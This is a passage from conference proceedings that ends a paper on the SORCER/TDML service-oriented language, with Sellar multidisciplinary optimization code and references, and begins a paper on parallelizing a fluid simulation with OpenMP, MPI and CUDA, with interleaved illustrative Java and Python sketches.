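How a builder signature might be turned into an instance can be sketched with Java reflection: the signature names a static operation of a builder type, and instantiation invokes that operation with the declared initialization values. The helper names sig, init and inst below deliberately mimic the TDML operators but are hypothetical re-creations for illustration (assuming Java 16 or later for records), not the SORCER implementation.

```java
import java.lang.reflect.Method;
import java.util.LinkedHashMap;
import java.util.Map;

// Illustrative sketch only: hypothetical helpers that mimic, but are not, the TDML sig/inst operators.
final class BuilderSignatureSketch {

    /** A builder signature: a static operation of a builder type plus initial attribute values. */
    record BuilderSig(String operation, Class<?> builderType, Map<String, Object> init) { }

    static BuilderSig sig(String operation, Class<?> builderType) {
        return new BuilderSig(operation, builderType, new LinkedHashMap<>());
    }

    /** Returns a copy of the signature extended with one more attribute-value pair. */
    static BuilderSig init(BuilderSig s, String att, Object val) {
        Map<String, Object> copy = new LinkedHashMap<>(s.init());
        copy.put(att, val);
        return new BuilderSig(s.operation(), s.builderType(), copy);
    }

    /** Instantiates by invoking the static builder operation with the initialization map. */
    static Object inst(BuilderSig s) {
        try {
            Method m = s.builderType().getDeclaredMethod(s.operation(), Map.class);
            m.setAccessible(true);
            return m.invoke(null, s.init());   // null receiver: the operation is static
        } catch (ReflectiveOperationException e) {
            throw new IllegalStateException("cannot instantiate with " + s, e);
        }
    }

    /** Example builder type with one static operation (hypothetical). */
    static final class PointBuilder {
        static Map<String, Object> createPoint(Map<String, Object> init) {
            Map<String, Object> point = new LinkedHashMap<>();
            point.put("x", 0.0);
            point.put("y", 0.0);
            point.putAll(init);                // initialization values override the defaults
            return point;
        }
    }

    public static void main(String[] args) {
        Object point = inst(init(sig("createPoint", PointBuilder.class), "x", 3.0));
        System.out.println(point);
    }
}
```

Keeping the signature as data and deferring the reflective call to inst is what lets the representation be swapped later without touching the code that requests the instance.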
4 Discipline Execution and Aggregations
Depending on the types of disciplines declared in disciplinary intents, an intent is executed by a corresponding TDML operator (executor), e.g., responses, search, analyze, explore, supervise, and hypervise. The executed intent contains both a result and its executed discipline. A created or executed discipline that is declared by myIntent is selected by discipline(myIntent). If a discipline intent declares an output filter, then myResult = explore(myIntent); otherwise, the result can be selected from the executed intent with TDML operators (getters) and/or the disciplinary Java API.
Note that when a discipline is a discipline of disciplines, it becomes a service consumer with respect to its component disciplines, which in turn are service providers. Subsequently, any composed provider may be a requestor of services. Service-oriented computing adheres to a distributed architecture that partitions workloads between service peers. A peer can be a service requestor and/or a service provider. A service consumer utilizes results from multiple service requestors that rely on code providers (workers). Services are said to form a peer-to-peer (P2P) network of services. Disciplinary peers make a portion of their disciplines directly available to other local and/or remote network disciplines, without the need for central coordination, in contrast to the traditional client–server model in which the consumption and supply of resources are strictly divided. Transdisciplines and disciplines adopt many organizational architectures. Elementary services are functional service entries and procedural tasks. Aggregations of functional entries (functions of functions) form declarative domains called service models. Aggregations of procedural tasks form imperative domains called service routines: block-structured and composite-structured routines. Models and routines are elementary disciplines used to create various types of transdisciplines, e.g., transdomains (either transmodels or transroutines), collaborations, regions, and governances with relevant adaptive multifidelity morphers and controllers (e.g., analyzers, optimizers, explorers, supervisors, hypervisors, initializers, and finalizers) that manage cooperations of disciplines. Five service-oriented types of service aggregations are distinguished, as illustrated in Fig. 2. Elementary and combined services are called request services. Elementary services comprise opservices, whereas combined services comprise request services. Disciplines are combined services.
Each disciplinary type represents a different granularity of hierarchically organized code providers in the network referred to by operation services (evaluators and signatures). Transdisciplines are composed of disciplines, and transdomains of domain services (models and routines), which in turn are composed of elementary services (entries and tasks, respectively), which in turn rely on opservices (evaluators and signatures), which in turn bind at runtime to code providers in the network of domain-specific ATUs. The UML diagram in Fig. 2 illustrates the five described granularities of services, from the highest transdisciplinary granularity to the lowest opservice granularity. Opservices, as required by transdisciplines, use code providers that call associated executable codes.
Fig. 2. Five Types of Service Aggregations: From Code Providers to Transdisciplines
5 An Example of a Distributed Transdiscipline in TDML
To illustrate the basic TDML concepts, the Sellar multidisciplinary optimization problem [4] is used to implement a multidisciplinary analysis and optimization (MADO) transdiscipline. Distributed transdisciplines in TDML allow component disciplines to be two-way coupled and distributed in the network as well. In Sect. 5.1 we specify a Sellar intent sellarIntent that declares its transdiscipline by a builder signature as follows:
disciplineSig(SellarRemoteDisciplines.class, "createSellarModelWithRemoteDisciplines")
The transdiscipline is implemented by the method createSellarModelWithRemoteDisciplines of the class SellarRemoteDisciplines described in Sect. 5.2; then, in Sect. 5.3, the Sellar intent sellarIntent is executed.
5.1 Specify the Sellar Intent with the MadoIntent Operator
Intent sellarIntent = madoIntent(
    initialDesign(predVal("y2$DiscS1", 10.0),
        val("z1", 2.0), val("x1", 5.0), val("x2", 5.0)),
    disciplineSig(SellarRemoteDisciplines.class,
        "createSellarModelWithRemoteDisciplines"),
    optimizerSig(ConminOptimizerJNA2.class),
    ent("optimizer/strategy", new ConminStrategy(…)),
    mdaFi("fidelities",
        // first MDA fidelity: declared by a signature
        mda("sigMda", sig(SellarMda.class)),
        // second MDA fidelity: a lambda that iterates until y2 stops changing
        mda("lambdaMda", (Requestor mdl, Context cxt) -> {
            Context ec;
            double y2a, y2b, d = 0.000001;
            do {
                update(cxt, outVi("y1$DiscS1"), outVi("y2$DiscS2"));
                y2a = (double) exec(mdl, "y2$DiscS1");
                ec = eval(mdl, cxt);
                y2b = (double) value(ec, outVi("y2$DiscS2"));
            } while (Math.abs(y2a - y2b) > d);
        })));
Note that the Sellar transdiscipline is declared by disciplineSig, with two fidelities for multidisciplinary analysis (MDA) and the Conmin optimizer. The first MDA fidelity is specified by a constructor signature, the second one by a lambda evaluator.
5.2 Define the Sellar Model with Two Distributed Disciplines
The Sellar transdiscipline has its own builder, with two separate builders for the component disciplines DiscS1 and DiscS2. Builders implement all disciplines as declared in TDML below, with component disciplines to be deployed in the network. The Sellar model declares variables of dependent remote disciplines by proxies of remote models declared by the remote signatures sig(ResponseModeling.class, prvName("Sellar DiscS1")) and sig(ResponseModeling.class, prvName("Sellar DiscS2")), respectively. Note that the proxy variables y1 and y2 of the remote disciplines DiscS1 and DiscS2 are coupled in sellarDistributedModel, the disciplines being remote in the network as specified by the remote interface ResponseModeling and the names used for the remote models: "Sellar DiscS1" and "Sellar DiscS2". The TDML svr operator declares a service variable (as a function of functions via args).
MadoModel sellarDistributedModel = madoModel("Sellar",
    objectiveVars(svr("fo", "f", SvrInfo.Target.min)),
    outputVars(
        svr("f", exprEval("x1*x1 + x2 + y1 + Math.exp(-y2)",
            args("x1", "x2", "y1", "y2"))),
        svr("g1", exprEval("1 - y1/3.16", args("y1"))),
        svr("g2", exprEval("y2/24 - 1", args("y2")))),
    // w.r.t
    inputVars(
        svr("z1", 1.9776, bounds(-10.0, 10.0)),
        svr("x1", 5.0, bounds(0.0, 10.0)),
        svr("x2", 2.0, bounds(0.0, 10.0))),
    // s.t.
    constraintVars(
        svr("g1c", "g1", SvrInfo.Relation.lte, 0.0),
        svr("g2c", "g2", SvrInfo.Relation.lte, 0.0)),
    // disciplines with remote vars
    responseModel("DiscS1", outputVars(
        prxSvr("y1", sig(ResponseModeling.class, prvName("Sellar DiscS1")),
            args("z1", "x1", "x2", "y2")))),
    responseModel("DiscS2", outputVars(
        prxSvr("y2", sig(ResponseModeling.class, prvName("Sellar DiscS2")),
            args("z1", "x2", "y1")))),
    // two-way couplings: svr-from-to
    cplg("y1", "DiscS1", "DiscS2"),
    cplg("y2", "DiscS2", "DiscS1"));
configureSensitivities(sellarDistributedModel);
Remote response models that are deployed by SORCER service provider containers are declared in TDML as follows:
Model dmnS1 = responseModel("DiscS1",
    inputVars(
        svr("z1", 1.9776, bounds(-10.0, 10.0)),
        svr("x1", 5.0, bounds(0.0, 10.0)),
        svr("x2", 2.0, bounds(0.0, 10.0)),
        svr("y2")),
    outputVars(
        svr("y1", exprEval("z1*z1 + x1 + x2 - 0.2*y2",
            args("z1", "x1", "x2", "y2")))));

Model dmsS2 = responseModel("DiscS2",
    inputVars(
        svr("z1", 1.9776, bounds(-10.0, 10.0)),
        svr("x1", 5.0, bounds(0.0, 10.0)),
        svr("x2", 2.0, bounds(0.0, 10.0)),
        svr("y1")),
    outputVars(
        svr("y2", exprEval("Math.sqrt(y1) + z1 + x2",
            args("z1", "x2", "y1")))));
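The two-way coupling between DiscS1 and DiscS2 means that y1 and y2 must be solved together. The following plain-Java sketch iterates the two expressions from the response models above until y2 stops changing, in the spirit of the lambda MDA fidelity of Sect. 5.1. It is an illustration only: the class and method names are hypothetical, no SORCER services are involved, and convergence of such a simple fixed-point loop is assumed rather than guaranteed for arbitrary inputs.

```java
// Illustrative sketch only: a plain-Java fixed-point iteration, not the SORCER MDA implementation.
final class SellarFixedPointSketch {

    /** Discipline DiscS1: y1 = z1*z1 + x1 + x2 - 0.2*y2. */
    static double y1(double z1, double x1, double x2, double y2) {
        return z1 * z1 + x1 + x2 - 0.2 * y2;
    }

    /** Discipline DiscS2: y2 = sqrt(y1) + z1 + x2. */
    static double y2(double z1, double x2, double y1) {
        return Math.sqrt(y1) + z1 + x2;
    }

    /** Objective f = x1*x1 + x2 + y1 + exp(-y2), as declared in the Sellar model. */
    static double objective(double x1, double x2, double y1, double y2) {
        return x1 * x1 + x2 + y1 + Math.exp(-y2);
    }

    /** Iterates the coupled disciplines until y2 changes by at most tol; returns {y1, y2}. */
    static double[] solve(double z1, double x1, double x2, double y2Guess, double tol, int maxIter) {
        double y2Old = y2Guess;
        for (int i = 0; i < maxIter; i++) {
            double y1New = y1(z1, x1, x2, y2Old);   // DiscS1 uses the latest y2
            double y2New = y2(z1, x2, y1New);       // DiscS2 uses the fresh y1
            if (Math.abs(y2New - y2Old) <= tol) {
                return new double[] {y1New, y2New};
            }
            y2Old = y2New;
        }
        throw new IllegalStateException("coupled analysis did not converge");
    }

    public static void main(String[] args) {
        double z1 = 1.9776, x1 = 5.0, x2 = 2.0;     // default values from the input variables above
        double[] y = solve(z1, x1, x2, 10.0, 1e-9, 100);
        System.out.println("y1 = " + y[0] + ", y2 = " + y[1]);
        System.out.println("f  = " + objective(x1, x2, y[0], y[1]));
        System.out.println("g1 = " + (1 - y[0] / 3.16) + ", g2 = " + (y[1] / 24 - 1));
    }
}
```

An optimizer would call such a coupled analysis once per candidate design and then read the objective f and the constraints g1 and g2 from the converged values.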
5.3 Execute the Sellar Intent
Now we can explore the distributed Sellar model specified by the intent sellarIntent created in Sect. 5.1:
ExploreContext result = explore(sellarIntent);
and inspect the results embedded in the returned result. The Sellar model case study presented above was developed as a design template for the complex aero-structural multidisciplinary models currently used at the Multidisciplinary Science and Technology Center/AFRL.
6 Conclusions The mathematical view of process expression has limited computing science to the class of processes expressed by algorithms. From experience in the past decades it becomes obvious that in computing science the common thread in all computing disciplines is process expression; that is not limited to algorithms or actualization of process expression by a single computer. In this paper, service-orientation is proposed as the approach with five types of service aggregations (see Fig. 2). The “everything is a service” semantics of TDML (see Fig. 1) has been developed to deal with multidisciplinary complexity at various levels to be actualized by dynamic cooperations of code providers in the network. The SORCER architectural approach represents five types of net-centric service cooperations expressed by request services. In general, disciplinary requestors (context intents) are created by the end users but executable codes of code providers by software developers. It elevates combinations of disciplines into the first-class citizens of the SO multidisciplinary process expression.
True service-orientation means that in a net-centric process both the service requestors and the service providers must be expressed and then realized, under the condition that service consumers never communicate directly with service providers. Transdisciplines are asserted complex cooperations of code providers, represented in TDML directly by operation services. In this way, everything is a service at various levels of service granularity (see Fig. 2). Request services therefore represent cooperations of opservices bound at runtime to code providers that execute the computations. The essence of the approach is that, by making specific choices in grouping code providers hierarchically into disciplines, we can obtain desirable dynamic properties from the SO systems we create with TDML. Thinking more explicitly about SO languages as domain-specific languages for humans rather than software languages for computers may be our best tool for dealing with real-world multidisciplinary complexity. Understanding the principles that run across process expressions in TDML, and appreciating which language features are best suited to which types of processes, brings these process expressions (context intents in TDML) to useful life. No matter how complex and polished the individual process operations are, it is often the quality of the operating system (SORCER) and its programming environment (TDML) that determines the power of the computing system. The ability of the presented transdisciplines, together with the SO execution engine, to leverage network resources as services is significant to real-world applications in two ways. First, it supports multi-machine executable codes via opservices that may be required by SO multidisciplinary applications; second, it enables cooperation among a variety of computing resources, represented by multiple disciplines composed of network opservices that are actualized by the multi-machine network at runtime.
Embedded service integration in the form of transdisciplines in TDML solves a problem for both system developers and end users. It is a transformative development that resolves the stand-off between system developers, who need to innovate service integrations, and end users, who as coproducers want their services to be productive in their multidisciplinary systems rather than hold them back. Multidisciplinary integration is key to this, but neither system developers nor end users want to be distracted by time-consuming integration projects. The SORCER multidisciplinary platform has been successfully deployed and tested for design space exploration, parametric, and aero-structural optimization in multiple projects at the Multidisciplinary Science and Technology Center AFRL/WPAFB. Most MADO applications and results are proprietary, except those approved for public release.
Acknowledgments. This effort was sponsored by the Air Force Research Laboratory's Multidisciplinary Science and Technology Center (MSTC), under the Collaborative Research and Development for Innovative Aerospace Leadership (CRDInAL) - Thrust 2 prime contract (FA8650-16C-2641) to the University of Dayton Research Institute (UDRI). This paper has been approved for public release: distribution unlimited. Case Number: AFRL-2022-1664. The effort is also partially supported by the Polish Japanese Academy of Information Technology.
References
1. Burton, S.A., Alyanak, E.J., Kolonay, R.M.: Efficient supersonic air vehicle analysis and optimization implementation using SORCER. In: 12th AIAA Aviation Technology, Integration, and Operations (ATIO) Conference and 14th AIAA/ISSM AIAA 2012–5520 (2012)
2. Kao, J.Y., White, T., Reich, G., Burton, S.: A multidisciplinary approach to the design of a low-cost attritable aircraft. In: 18th AIAA/ISSMO Multidisciplinary Analysis and Optimization Conference, AIAA Aviation Forum 2017, Denver, Colorado (2017)
3. Kolonay, R.M., Sobolewski, M.: Service oriented computing environment (SORCER) for large scale, distributed, dynamic fidelity aeroelastic analysis & optimization. In: International Forum on Aeroelasticity and Structural Dynamics, IFASD2011, 26–30 June, Paris, France (2011)
4. Sellar, R.S., Batill, S.M., Renaud, J.E.: Response surface based, concurrent subspace optimization for multidisciplinary system design, Paper 96-0714. In: AIAA 34th Aerospace Sciences Meeting and Exhibit, Reno, Nevada, January (1996)
5. Sobolewski, M.: Federated P2P services in CE environments. In: Advances in Concurrent Engineering, pp. 13–22. A.A. Balkema Publishers (2002)
6. Sobolewski, M.: Service oriented computing platform: an architectural case study. In: Ramanathan, R., Raja, K. (eds.) Handbook of Research on Architectural Trends in Service-Driven Computing, pp. 220–255. IGI Global, Hershey (2014)
7. Sobolewski, M.: Amorphous transdisciplinary service systems. Int. J. Agile Syst. Manag. 10(2), 93–114 (2017)
8. Sobolewski, M.: True service-oriented metamodeling architecture. In: Ferguson, D., Méndez Muñoz, V., Pahl, C., Helfert, M. (eds.) CLOSER 2019. CCIS, vol. 1218, pp. 101–132. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-49432-2_6
9. SORCER/TTU Projects. http://sorcersoft.org/theses/index.html. Accessed 22 July 2022
10. SORCER Project. https://github.com/mwsobol/SORCER-multiFi. Accessed 22 July 2022
11. River (Jini) project. https://river.apache.org. Accessed 22 July 2022
12. Rio Project. https://github.com/dreedyman/Rio. Accessed 22 July 2022
Incompressible Fluid Simulation Parallelization with OpenMP, MPI and CUDA
Xuan Jiang1(B), Laurence Lu2, and Linyue Song3
1 Civil and Environmental Engineering Department, UC Berkeley, Berkeley, USA
[email protected]
2 Electrical Engineering and Computer Science Department, UC Berkeley, Berkeley, USA
3 Computer Science Department, UC Berkeley, Berkeley, USA
Abstract. We base our initial serial implementation on the original code presented in Jos Stam's paper. OpenMP was the easiest of the three to implement. Because of the grid-based nature of the solver and the shared-memory nature of OpenMP, the implementation did not require mutexes or any other data locks, and the pragmas could be inserted without inducing data races in the code. We also note that the Gauss-Seidel method, which solves a linear system using intermediate values, can introduce errors that cascade, because each update relies on neighboring cells that have already been updated. This issue is avoidable by looping over the cells in two passes such that each pass covers one color of a disjoint checkerboard pattern. In the CUDA implementation, the set_bnd function for enforcing boundary conditions has two main parts, enforcing the edges and the corners, respectively. This imposes a strange implementation in which we dedicate exactly one block and one thread to an additional kernel that resolves the corners, but it has almost no impact on performance; the most time-consuming parts of our implementation are cudaMalloc and cudaMemcpy. The only synchronization primitive that this code uses is __syncthreads(). We carefully avoided atomic operations, which are expensive, but we need __syncthreads() at the end of diffuse, project and advect because we reset the boundaries of the fluid after every diffusion and advection step. Data races similar to those in the OpenMP case arise here without the two-pass method. Like the OpenMP implementation, the pure MPI implementation inherits many of the features of the serial implementation. However, it also performs domain decomposition and the necessary communication. Synchronization is performed through these communication steps, although the local nature of the simulation means that there is no implicit global barrier and much of the computation can be done almost asynchronously.
Keywords: OpenMP · MPI · CUDA · Fluid Simulation · Parallel Computation
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 385–395, 2023. https://doi.org/10.1007/978-3-031-28073-3_28
1 Introduction
In order to make the fluid simulator unconditionally stable, Jos Stam's [4] implementation makes an approximation while computing the diffusion effects. Specifically, instead of intuitively using the densities of the eight surrounding cells in the PREVIOUS step to update the density of the center cell in the current step, it uses the densities of the neighboring cells in the CURRENT step. This makes the implementation horizontally and vertically asymmetric and unparallelizable. However, we find that the intuitive implementation of the simulation is unstable only if the diffusion rate is larger than 1, and Jos Stam defines this rate to be dt * gridSize^2 * const. We think the qualitative local behaviour should not depend on the size of the grid, so we replaced gridSize with a Scale variable, a constant that represents the spatial step size. Now, as long as we set an appropriate value for the Scale variable, the intuitive implementation (using previous states to update current states) is always stable. Therefore, we implement our own serial version of the fluid simulator, which has a newly defined diffusion rate and uses the previous states to update the current states. We use this parallelizable implementation as our serial base code.
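The idea of updating from the previous state can be sketched in a few lines of Python. This is a minimal illustration, not the authors' code: it assumes a four-neighbour stencil (the text mentions eight surrounding cells), takes the diffusion rate as a ready-made number rather than deriving it from dt and Scale, and uses the hypothetical name diffuse_explicit.

```python
def diffuse_explicit(prev, rate):
    """One explicit diffusion step on a square grid with a one-cell border.

    Every interior cell is computed from `prev` only, so the cells can be
    visited in any order (or in parallel) without changing the result.
    The four-neighbour stencil is an assumption made for this sketch.
    """
    n = len(prev)
    cur = [row[:] for row in prev]  # border cells are copied unchanged
    for i in range(1, n - 1):
        for j in range(1, n - 1):
            neighbours = (prev[i - 1][j] + prev[i + 1][j]
                          + prev[i][j - 1] + prev[i][j + 1])
            cur[i][j] = prev[i][j] + rate * (neighbours - 4.0 * prev[i][j])
    return cur

# Illustrative input: a single unit of density in the middle of a 5 x 5 grid.
grid = [[0.0] * 5 for _ in range(5)]
grid[2][2] = 1.0
after = diffuse_explicit(grid, rate=0.1)
```

Because the function never writes into the array it reads from, the two loops carry no dependence between iterations, which is the property that makes this variant a convenient base for the parallel versions.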
2 Implementation and Tuning Effort
2.1 OpenMP
Running the Intel VTune profiler on our serial implementation gives the following results (Fig. 1):
Fig. 1. Serial implementation runtime distribution
The project function is by far the most costly function. Indeed, it contains several multi-level loops. By using omp for collapse around these loop nests, we reduce the run time of the project function to a quarter of its original run time when using four threads. Running the Intel VTune profiler on our OpenMP implementation gives the following results (Fig. 2):
Fig. 2. OpenMP implementation runtime distribution
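The two-pass checkerboard ordering mentioned in the abstract is what lets a Gauss-Seidel style loop nest be split across threads safely. The Python sketch below shows only the ordering, not OpenMP itself. It assumes the linear system has the form (1 + 4a) x = x0 + a * (sum of the four neighbours), as in Stam-style diffusion solvers; the names red_black_sweep and residual are hypothetical.

```python
def red_black_sweep(x, x0, a):
    """One checkerboard sweep for (1 + 4a) * x = x0 + a * neighbours.

    Cells with (i + j) even are updated first, then cells with (i + j) odd.
    A cell only reads cells of the other colour, so all cells of one colour
    could be updated concurrently without a data race.
    """
    n = len(x)
    for colour in (0, 1):
        for i in range(1, n - 1):
            for j in range(1, n - 1):
                if (i + j) % 2 != colour:
                    continue
                neighbours = (x[i - 1][j] + x[i + 1][j]
                              + x[i][j - 1] + x[i][j + 1])
                x[i][j] = (x0[i][j] + a * neighbours) / (1.0 + 4.0 * a)
    return x

def residual(x, x0, a):
    """Largest violation of the linear system over the interior cells."""
    n = len(x)
    worst = 0.0
    for i in range(1, n - 1):
        for j in range(1, n - 1):
            neighbours = (x[i - 1][j] + x[i + 1][j]
                          + x[i][j - 1] + x[i][j + 1])
            worst = max(worst, abs((1.0 + 4.0 * a) * x[i][j]
                                   - a * neighbours - x0[i][j]))
    return worst

# Illustrative input: 4 x 4 interior with a fixed zero border.
n = 6
x0 = [[0.0] * n for _ in range(n)]
x0[2][3] = 1.0
x = [row[:] for row in x0]
for _ in range(50):
    red_black_sweep(x, x0, a=0.5)
```

In a threaded version, each of the two colour passes would be one parallel loop, with a barrier between the passes.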
2.2 MPI
Because of the heavily localized nature of our fluid solver, we make the following observations: because the projection, advection, and diffusion steps all act on different quantities of the fluid (e.g. pressure and velocity), we found that it would be more efficient
With MPI, one of the more difficult implementation problems was finding a general method for domain decomposition. Because the dimensions of the grid are rigidly fixed in an array, rather than the grid being an abstract square of fixed width, it is difficult to find a division of the array that is not simply row-by-row (especially if the number of processes and the array width are coprime). We first attempted domain decomposition by finding a pair (a, b) such that ab = p and both a and b divide N + 2 (the number of rows including borders). Given such a pair, we chunk the fluid array into blocks of size (N + 2)/a by (N + 2)/b. If no satisfactory decomposition can be found, we fall back to domain decomposition in a nearly row-by-row manner. If there are more rows than processes, each process gets N/p rows, plus an additional row if its rank is below the remainder N % p, and we rely on tags and nonblocking send/receive calls to prevent unwanted overlapping of messages. If there are more processes than rows, we force the processes with rank higher than N to terminate early. However, this method is still difficult to generalize fully, especially if N + 2 happens to be prime (or coprime to the number of processors, which is likely!). Otherwise, within each processor's block, iteration proceeds very similarly to a regular serial solver. Directly adapting the serial implementation reveals the extreme burden of communication costs in the row-by-row scenario.
In the worst case, row decomposition maximizes the side length of a block relative to other regular decompositions (such as square grid cells), and because the Gauss-Seidel method depends on intermediate computations, a very large amount of communication is performed between adjacent processes. Because of this, we experimented with the Jacobi method (which relies only on the initial values at each timestep), so that communication happens when computations finish rather than on every intermediate step.
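The decomposition rule described in this section can be written down compactly. The following Python sketch covers only the index arithmetic, with no MPI calls. The helper names block_factors and rows_for_rank are hypothetical, and the preference for the most nearly square pair (a, b) is an assumption, since the text only requires that such a pair exists.

```python
def block_factors(p, n_rows):
    """Return (a, b) with a * b == p and both dividing n_rows, else None.

    Among the valid pairs, the one closest to square is preferred
    (an assumption made for this sketch).
    """
    best = None
    for a in range(1, p + 1):
        if p % a:
            continue
        b = p // a
        if n_rows % a == 0 and n_rows % b == 0:
            if best is None or abs(a - b) < abs(best[0] - best[1]):
                best = (a, b)
    return best

def rows_for_rank(rank, p, n):
    """Row-by-row fallback: (first_row, row_count) owned by `rank`.

    Each rank gets n // p rows, and ranks below n % p get one extra row.
    When p > n, the ranks that receive no rows get a count of 0.
    """
    base, extra = divmod(n, p)
    count = base + (1 if rank < extra else 0)
    first = rank * base + min(rank, extra)
    return first, count
```

For example, with N + 2 = 202 rows, block_factors(4, 202) yields a 2 by 2 block layout, whereas block_factors(3, 202) returns None and the row-by-row fallback applies.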
2.3 CUDA
Initially we copied data from the CPU to the GPU during each iteration of the simulation, but this was very time-consuming and introduced many segmentation faults that took considerable effort to debug. Once everything ran (no segmentation faults, but still failing the correctness check), we found that the CUDA version was even slower than OpenMP. After careful discussion, we decided to copy the data only once, at the beginning of the simulation, instead of copying it in every iteration. This saved a substantial amount of copy time, since we run 100 iterations in our simulation, and this time our CUDA code was 7x faster than OpenMP. We used an array to store the location of the fluid in the different grids, as a pointer to the location, since the fluid would be sorted and stored contiguously in grids. However, we had a lot of trouble ensuring correctness: in init_simulation everything seemed correct, but after some iterations there were synchronization issues in which the grids were sometimes not sorted properly. Adding synchronization primitives such as cudaDeviceSynchronize() and __syncthreads() only slowed down the code and did not fix correctness. We tried several things to solve this:
1. Located the exact places where the density array went wrong by using printf in CUDA.
2. Checked other variables to see whether they also went wrong.
3. Checked the values before and after each copy to see whether there was an error on the GPU side.
4. Checked whether we had copied data or pointers.
After all these checks, we found that some of the copies were wrong: there are many of them, and it is easy to get the sizes of the different objects wrong. We also had not loaded all the modules we needed, which caused segmentation faults as well. We now pass the correctness check, but we were worried that data races would incur many GPU cache misses.
Given how performant the GPU architecture is in terms of registers and memory bandwidth, this concern should be minimal. The final implementation is much faster than both the OpenMP and the serial code. Correctness aside, the performance of copying data at each iteration was very poor because of the repeated cudaMemcpy calls that transfer data from the CPU to the GPU. Fortunately, our final implementation keeps all of its computation in GPU memory. Surprisingly, the code is very straightforward and cleaner than the original implementation.
3 Experimental Data: Scaling and Performance Analysis and Interesting Inputs and Outputs
After finishing our OpenMP and CUDA implementations, we conducted our experiments on the Cori supercomputer at the National Energy Research Scientific Computing Center and the Bridges-2 supercomputer at the Pittsburgh Supercomputing Center, respectively.
3.1 OpenMP
Slowdown Plot. Figure 3 shows the slowdown plot of our OpenMP implementation. We can clearly see that the plot can be divided into two sections. For the first three data points, the run time grows linearly as the problem size increases. This is what we expected, since there is minimal communication among the threads in our implementation. However, on closer inspection, the slope of the line is less than 1. We think this anomaly can be explained by the small problem sizes of the first three data points. When the problem size is small, the program spends most of its run time in setup operations such as memory allocation and initialization, rather than in actual computation. For the second half of the plot, the program run time grows linearly with a slope close to 1. This indicates that the computation time starts to dominate the program run time. Because there is minimal communication overhead in our OpenMP implementation, the slope of the curve is close to 1.
Fig. 3. OpenMP log-log slowdown plot. Num Thread = 68
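The slope read off a log-log slowdown plot can be estimated with an ordinary least-squares fit of log(time) against log(size). The Python sketch below is a generic helper with the hypothetical name loglog_slope, not the authors' analysis script, and the numbers in the usage note are made up purely for illustration.

```python
import math

def loglog_slope(sizes, times):
    """Least-squares slope of log(time) against log(size)."""
    xs = [math.log(s) for s in sizes]
    ys = [math.log(t) for t in times]
    mean_x = sum(xs) / len(xs)
    mean_y = sum(ys) / len(ys)
    num = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    den = sum((x - mean_x) ** 2 for x in xs)
    return num / den
```

A run time that is exactly proportional to the problem size gives a slope of 1. Adding a constant setup cost to every measurement, for instance times of 6, 7 and 9 units for sizes 100, 200 and 400, pulls the fitted slope below 1, which matches the explanation given above for the first three data points.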
3.2 Strong Scaling
Figure 4 shows a strong scaling plot for our OpenMP implementation when the grid size is 200 * 200. Until the number of threads reaches 16, the curve decreases linearly with a slope close to -1, which indicates good strong scaling efficiency. However, once the number of threads reaches 16, the program run time starts to flatten out. We believe this is caused by the setup overheads of OpenMP threads. When there is an excessive number of threads for a small problem, the marginal benefit of adding threads diminishes. To verify our hypothesis, we also conducted the strong scaling experiment with a problem size of 400 * 400 (Fig. 5). We can see that with a larger problem size, our OpenMP implementation scales well even when the number of threads increases to 64, and stays very close to the ideal scaling line.
Fig. 4. Strong scaling OpenMP for grid size = 200 * 200
Fig. 5. Strong scaling OpenMP for grid size = 400 * 400
3.3 Weak Scaling
Figure 6 shows the weak scaling plot of our OpenMP implementation. For the first three data points the weak scaling efficiency is around 67%, and for the entire curve it is around 31%. The slope suddenly increases near the end of the curve. Since there is not much communication overhead in our OpenMP implementation, we think this is caused by thread setup/free costs and memory allocation costs. Memory allocations are not done in parallel, and allocating a large chunk of memory can impact the program run time significantly, as the overall program run time is relatively small.
Fig. 6. Weak scaling OpenMP
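The efficiency figures quoted in this section are presumably computed with the usual textbook definitions. The paper does not state its formulas, so the Python sketch below is an assumption, and the function names are hypothetical.

```python
def strong_scaling_efficiency(t1, tp, p):
    """Fixed total problem size: the ideal run time on p workers is t1 / p."""
    return t1 / (p * tp)

def weak_scaling_efficiency(t1, tp):
    """Problem size grows in proportion to p: the ideal run time stays at t1."""
    return t1 / tp
```

Here t1 is the run time on one worker and tp the run time on p workers. Under these definitions, a strong scaling curve with slope -1 on a log-log plot corresponds to an efficiency of 1, and a weak scaling efficiency of 0.5 means the run time has doubled while the work per worker stayed constant.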
3.4 MPI
Strong Scaling. We tested on one node with a fixed 3200 * 3200 block size. Figure 7 shows only a small jump in going from 16 to 32 ranks, after which performance remains good each time the number of processors is doubled.
Fig. 7. Strong scaling MPI (x-axis: Num_of_processors; y-axis: strong scale efficiency)
Weak Scaling. Figure 8 shows that our weak scaling efficiency is highest, at 77.56%, when we use two tasks. As we increase the number of ranks and the number of blocks by the same factor, the weak scaling efficiency falls to 55.01%, which is still fairly good.
Fig. 8. Weak scaling MPI (x-axis: num of processors; y-axis: weak scaling efficiency)
Slowdown Comparison. From Fig. 9, we can see that OpenMP is the slowest, followed by MPI, and CUDA is the fastest (from slowest to fastest: OpenMP -> MPI -> CUDA).
Fig. 9. Slowdown comparison (series: CUDA, OpenMP, MPI with 68 ranks)
3.5 CUDA
Slowdown Plot. Figure 10 shows the slowdown plot of our CUDA implementation. It also compares the performance of the CUDA implementation to that of the OpenMP implementation. We can see that the run time of our CUDA implementation increases with a much smaller slope than that of the OpenMP implementation. This is expected, as there are more threads on GPUs. Just like homework 2.3, we have not found a good way to change the number of threads used by GPUs on Bridges-2, so we are unable to perform a strong scaling analysis for our CUDA implementation.
Fig. 10. Strong Scaling Comparison CUDA vs OpenMP
4 Conclusion
4.1 Difficulty
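Theoretic Content/Creativity. Fluid dynamics simulation is usually done in serial ways. Jos Stam [4] proposed ways of implementing two-dimensional serial fluid simulation based on real fluid physics, which is determined by the Navier-Stokes equations:
$$\frac{\partial \mathbf{u}}{\partial t} = -(\mathbf{u} \cdot \nabla)\mathbf{u} + \nu \nabla^{2} \mathbf{u} + \mathbf{f}$$
$$\frac{\partial \rho}{\partial t} = -(\mathbf{u} \cdot \nabla)\rho + \kappa \nabla^{2} \rho + S$$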
where the first equation determines the movement of the velocity field and the second determines the movement of the density field. These two-dimensional implementations usually have O(n^2) time complexity. The main difficulties in parallelizing them, and the places where we used our creativity to solve the problem, are the following (detailed implementations are in the sections above):
